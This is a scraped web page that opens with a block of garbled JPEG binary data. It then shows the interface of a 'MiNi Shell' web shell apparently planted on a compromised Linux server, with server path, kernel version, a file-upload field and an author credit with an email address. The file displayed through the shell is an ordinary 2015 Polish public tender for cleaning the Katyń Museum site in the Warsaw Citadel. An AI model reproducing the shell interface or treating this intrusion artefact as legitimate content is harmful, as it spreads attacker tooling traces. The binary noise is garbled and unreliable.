JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151210/338336-N-2015.html

<p class="kh_header"><b>Warszawa: Usługi sprzątania w kaponierze i jej otoczeniu w Cytadeli Warszawskiej 
na potrzeby Muzeum Wojska Polskiego - oddział Muzeum Katyńskie 
 przy ul. Dymińskiej 13 w Warszawie</b><br>
<b>Numer ogłoszenia: 338336 - 2015; data zamieszczenia: 10.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Wojska Polskiego , Al. Jerozolimskie 3, 00-495 Warszawa, woj. mazowieckie, tel. 022 6295271, 72, faks 022 6295273.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeumwp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi sprzątania w kaponierze i jej otoczeniu w Cytadeli Warszawskiej 
na potrzeby Muzeum Wojska Polskiego - oddział Muzeum Katyńskie 
 przy ul. Dymińskiej 13 w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Miejsce wykonywania usługi:  	Muzeum Wojska Polskiego - Oddział Muzeum Katyńskie
	Cytadela Warszawska - Kaponiera
ul. Dymińska 13 , 01-783 Warszawa

I.	OPIS PRZEDMIOTU ZAMÓWIENIA.

1.	W ramach usługi sprzątania pomieszczeń i obiektów Muzeum Katyńskiego - oddziału  Muzeum Wojska Polskiego  na terenie Cytadeli Warszawskiej oraz usługi utrzymania  porządku terenu zewnętrznego Muzeum  w tym  usuwania śniegu  przy ul. Dymińskiej 13 01-783 Warszawa, Wykonawca zobowiązuje się wykonywać następujące czynności 
z następującą częstotliwością:
	
1)	Sprzątanie części biurowej i magazynowej - 280m2  (powierzchnia biurowa obejmuje: biura, korytarz, winda, aneks kuchenny, szatnia, pomieszczenia ochrony, 3 toalety, prysznic)
a)	 sprzątanie części biurowej codziennie, w godzinach porannych od poniedziałku do piątku, 
b)	sprzątanie powierzchni magazynowej ok.  80 m2 -  raz w miesiącu,
c)	mycie okien   dachowych o pow. ok. 50 m2 - 3 razy w roku oraz 4  okien  witrynowych  o pow. ok. 20 m2  - 4 razy w roku,
d)	usuwanie liści z rynien dachowych - dwa razy w roku (oczyszczenie rynien  o długości ok 100 mb. okna i rynny z utrudnionym dostępem /wymagane uprawnienia pracy na wysokości).
e)	codzienne odkurzanie lub mycie podłóg, w zależności od rodzaju powierzchni,
f)	codzienne opróżnianie koszy na śmieci, zapewnienie worków na śmieci, wynoszenie odpadków do śmietnika, opróżnianie pojemników w niszczarkach,
g)	mycie drzwi przeszklonych  - wg potrzeb, nie rzadziej niż raz  w tygodniu
h)	mycie pozostałych drzwi - raz w tygodniu,
i)	 utrzymanie w czystości wycieraczek wewnątrz i zewnątrz budynku, 
j)	usuwanie pajęczyn ze ścian i sufitów,
k)	wycieranie kurzu z mebli biurowych, wycieranie parapetów okiennych, sprzętu i urządzeń biurowych,  w tym telefonów - w razie potrzeby, ale nie rzadziej niż raz w tygodniu.
l)	odkurzanie klimakonwektorów - raz w miesiącu,
m)	olejowanie podłogi  i zabudowy z bruku drewnianego raz na pół roku

2)	Sprzątanie części wystawienniczej i zabezpieczającej - ok. 950 m2 (powierzchnia wystawiennicza - ok. 800m2 posiada podłogę z bruku drewnianego - olejowanego, część zabezpieczająca to: klatka schodowa,  szatnia, winda, 4 toalety z podłogą z żywic, wejście /poterna/ - podłoga kamienna) 
a)	sprzątanie części wystawienniczej i zabezpieczającej od 8.00 do 10.00  od środy  do niedzieli,
b)	codzienne odkurzanie lub mycie podłóg, w zależności od rodzaju powierzchni, 
c)	codzienne sprzątanie wejść do budynku, wycieraczek, wszystkich drzwi, poręczy, barierek, ławek, krzeseł  i lad w szatni,
d)	usuwanie pajęczyn ze ścian i sufitów - wg potrzeb,
e)	odkurzanie klimakonwektorów - raz w miesiącu - po ustaleniu terminu z przedstawicielem Muzeum,
f)	mycie 34 okien   fortecznych (utrudniony dostęp) o 1,4m2 pow.  każde  (razem 48 m2 ) - w razie potrzeby, ale nie rzadziej niż dwa  razy w roku,
g)	olejowanie podłogi z bruku drewnianego raz na pół roku

3)	Sprzątanie Baterii Barkowej (Epitafium) - ok. 290 m2  (podłoga z płyty bazaltowej) oraz tunelu i schodów - 160 m2

a)	sprzątanie Baterii Barkowej (Epitafium) w dni robocze dla Muzeum (środa - niedziela)  w godzinach porannych od 8.00 do godz. 10.00,
b)	 codzienne odkurzanie podłogi i mycie wg potrzeb,
c)	codzienne usuwanie wypalonych zniczy i zwiędłych kwiatów, pielęgnowanie tablic i postumentów w epitafium, czyszczenie ścieżki przed Epitafium,
d)	mycie 5 dużych witryn okiennych - wg potrzeb (nie rzadziej niż   raz w tygodniu),
e)	sprzątanie windy i dojście do windy   oraz poręczy -  ok. 80 m2 - w dni robocze dla Muzeum,
f)	codzienne sprzątanie schodów zewnętrznych o pow. ok. 80 m2  (ze szczególnym zwróceniem uwagi na oblodzenie),  mycie poręczy i oświetlenia umieszczonego w chodnikach, oraz cieku wodnego na schodach,
g)	sprzątanie pomieszczenia technicznego (stacja pomp) - raz w miesiącu,

4)	Sprzątanie  pomieszczeń Bramy Nowomiejskiej i poterny 
a)	sprzątanie poterny  - kostka kamienna 90 m2 - raz w tygodniu
b)	sprzątanie sanitariatów (3 toalety) 14 m2  - codziennie (w dni robocze Muzeum - środa - niedziela),
c)	sprzątanie pomieszczeń w Bramie Nowomiejskiej  - 60 m2  wraz z pomieszczeniami gospodarczymi i toaletami - codziennie.
d)	mycie okien  4 razy w roku,
e)	mycie drzwi przeszklonych, witryny i  gablot zewnętrznych   - wg. potrzeb ale nie rzadziej niż raz w tygodniu,
f)	mycie pozostałych drzwi i poręczy - raz w tygodniu
g)	olejowanie podłogi i  zabudowy z bruku drewnianego raz na pół roku

5)	Sprzątanie i utrzymanie  porządku terenu zewnętrznego Muzeum - ok. 20000 m2 

a)	sprzątanie  od poniedziałku do piątku oraz zależnie od potrzeb i warunków pogodowych (np. opady śniegu,  jesienne sprzątanie liści z drzew, burze) także w soboty i w niedziele,
b)	zamiatanie dróg, chodników i ciągów pieszych oraz grabienie liści,
c)	czyszczenie eksponatów zewnętrznych i ławek kamiennych oraz oczyszczanie oświetlenia umieszczonego w chodnikach i na  ścieżkach,
d)	odśnieżanie dróg dojazdowych, chodników i ciągów pieszych w sezonie zimowym oraz utrzymywanie ich w należytym, stanie w pozostałych porach roku (odśnieżanie - również w soboty i w niedziele),
e)	sprzątanie bramy wjazdowej, 
f)	codziennie opróżnianie koszy zewnętrznych, czyszczenie wycieraczek i usuwanie śmieci pod kratkami przy wejściu do budynków,
g)	usuwanie liści,  kwiatów, gałęzi z terenu kompleksu Muzeum  i ich wywóz - na bieżąco,
h)	usuwanie skutków ulewnych deszczy, burz, zawiei (zalegającego błota, połamanych gałęzi i drzew oraz innych zanieczyszczeń) - na bieżąco,
i)	w przypadku opadów śniegu, które wystąpiły w porze nocnej, Wykonawca odśnieży   drogi, schody, chodniki (ciągi komunikacyjne piesze)  do godz. 8.00, a pozostałe ciągi komunikacyjne dla zwiedzających do godz. 10.00.
j)	stałe utrzymanie czystości śmietnika,
6)	Sprzątanie i utrzymanie porządku we wszystkich toaletach i sanitariatach (13) obejmuje: 
a)	mycie i dezynfekowanie: podłóg, umywalek, armatury sanitarnej, muszli, pisuarów i desek klozetowych,
b)	mycie i dezynfekowanie innego wyposażenia (lustra, suszarki do rąk, szczotki do WC, kosze, pojemniki na mydło, podajniki ręczników), 
c)	zapewnienie przez Wykonawcę wszelkich środków czystości, płyn do czyszczenia WC, płyny do odpowiedniego rodzaju podłóg, mleczko do czyszczenia, mydło w płynie, mydło olejowe, papier toaletowy celulozowy i ręczniki papierowe celuloza, wkłady zapachowe do WC oraz odświeżacze powietrza( np. w aerozolu). 
d)	uzupełnianie papieru toaletowego, ręczników papierowych i mydła w płynie w toaletach  - niezwłocznie po stwierdzeniu ich zużycia,
e)	Wykonawca realizując usługę może stosować tylko takie środki, które posiadają atest PZH. Wykaz stosowanych środków przekaże zamawiającemu.

II.	OSOBY, NARZĘDZIA, URZĄDZENIA I ŚRODKI CZYSZCZĄCE PRZEZNACZONE DO WYKONYWANIA USŁUG
	
1.	Wykonawca zobowiązuje się przeznaczyć do wykonywania usług takiej liczby pracowników, która gwarantuje nieprzerwaną realizację usługi.
2.	Wykonawca zapewni  dyżur 1 osoby  od 10.00 do godz. 17.00 w środy, a od 10.00 do 16.00 od czwartku do niedzieli z następującymi zadaniami:
a)	ciągły przegląd i sprzątanie toalet, uzupełnianie mydła, ręczników papierowych, papieru toaletowego, kostek zapachowych w muszlach klozetowych,  przegląd i sprzątanie korytarzy, schodów, aneksu kuchennego, usuwanie wszelkich zanieczyszczeń zaistniałych  i zgłoszonych w czasie dyżuru (także w terenie zewnętrznym),
b)	wykonywanie innych prac zleconych przez Zamawiającego, a wynikających z przedmiotu zamówienia na obiektach Muzeum.
3.	Przed przystąpieniem do wykonywania usług Wykonawca zobowiązuje się wskazać Zamawiającemu imiona i nazwiska osób przeznaczonych do wykonywania usług. 
4.	W trakcie obowiązywania umowy Wykonawca zobowiązuje się informować Zamawiającego o każdej zmianie osób przeznaczonych do wykonywania usług poprzez wskazanie ich imion i nazwisk.
5.	Wykonawca zapewni wszelki sprzęt, narzędzia i środki do właściwego wykonania Zamówienia (środki czystości, płyny do czyszczenia WC, płyny do odpowiedniego rodzaju podłóg, mleczko do czyszczenia, mydło w płynie, mydło olejowe, papier toaletowy celulozowy i ręczniki papierowe celuloza, wkłady zapachowe do WC oraz odświeżacze powietrza¸ odkurzacze i dmuchawy do liści i śniegu - odpowiedniej mocy, wózki do sprzętu sprzątającego - kpl, itp.). 
6.	Wykonawca winien uwzględnić, iż Muzeum pracuje w weekendy oraz niektóre święta państwowe,
7.	 Wykonawca zapewni we własnym zakresie jednolity ubiór pracowników z widocznym identyfikatorem firmowym, opatrzonym imieniem i nazwiskiem pracownika - ubiór musi być dostosowany do pory roku.
8.	Planowana liczba odwiedzających w miesiącu to ok. 3000 osób.
9.	Wykonawca zobowiązuje się do dokonywania codziennych przeglądów urządzeń sanitarnych.
10.	Wykonawca zobowiązuje się do stosowania środków chemicznych posiadających atest PZH oraz dostosowanych do nawierzchni zgodnie z wymogami producenta.  (rodzaj środków przedstawi na piśmie zamawiającemu).
11.	Za zniszczenia wynikające ze złych środków chemicznych ponosi odpowiedzialność Wykonawca.
12.	Wykonawca zobowiązuje się poinformować Zamawiającego o wykrytych nieprawidłowościach i awariach, np. wyciekach wody, uszkodzonym oświetleniu, tłustych plamach, uszkodzonym ogrodzeniu, itp..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.92.00-4, 90.62.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu wymaganych przez art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu wymaganych przez art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych oraz wykazania wykonania lub wykonywania w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej trzech zamówień na usługi sprzątania w budynkach użyteczności publicznej o wartości nie mniejszej niż 200.000,- zł brutto (dwieście tysięcy złotych) w skali jednego roku oraz załączenia dowodów określających, że co najmniej te zamówienia zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu wymaganych przez art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu wymaganych przez art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu wymaganych przez art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-	prawidłowo wypełniony formularz ofertowy, sporządzony zgodnie z wzorem stanowiącym załącznikiem nr  1 do SIWZ;
-	upoważnienie do podpisywania ofert, o ile upoważnienie nie wynika z innych dokumentów dołączonych do oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeumwp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Wojska Polskiego w Warszawie, Al. Jerozolimskie 3, 00-495 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2015 godzina 09:00, miejsce: Muzeum Wojska Polskiego w Warszawie, Al. Jerozolimskie 3, 00-495 Warszawa, Kancelaria Jawna -parter w części biurowej.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com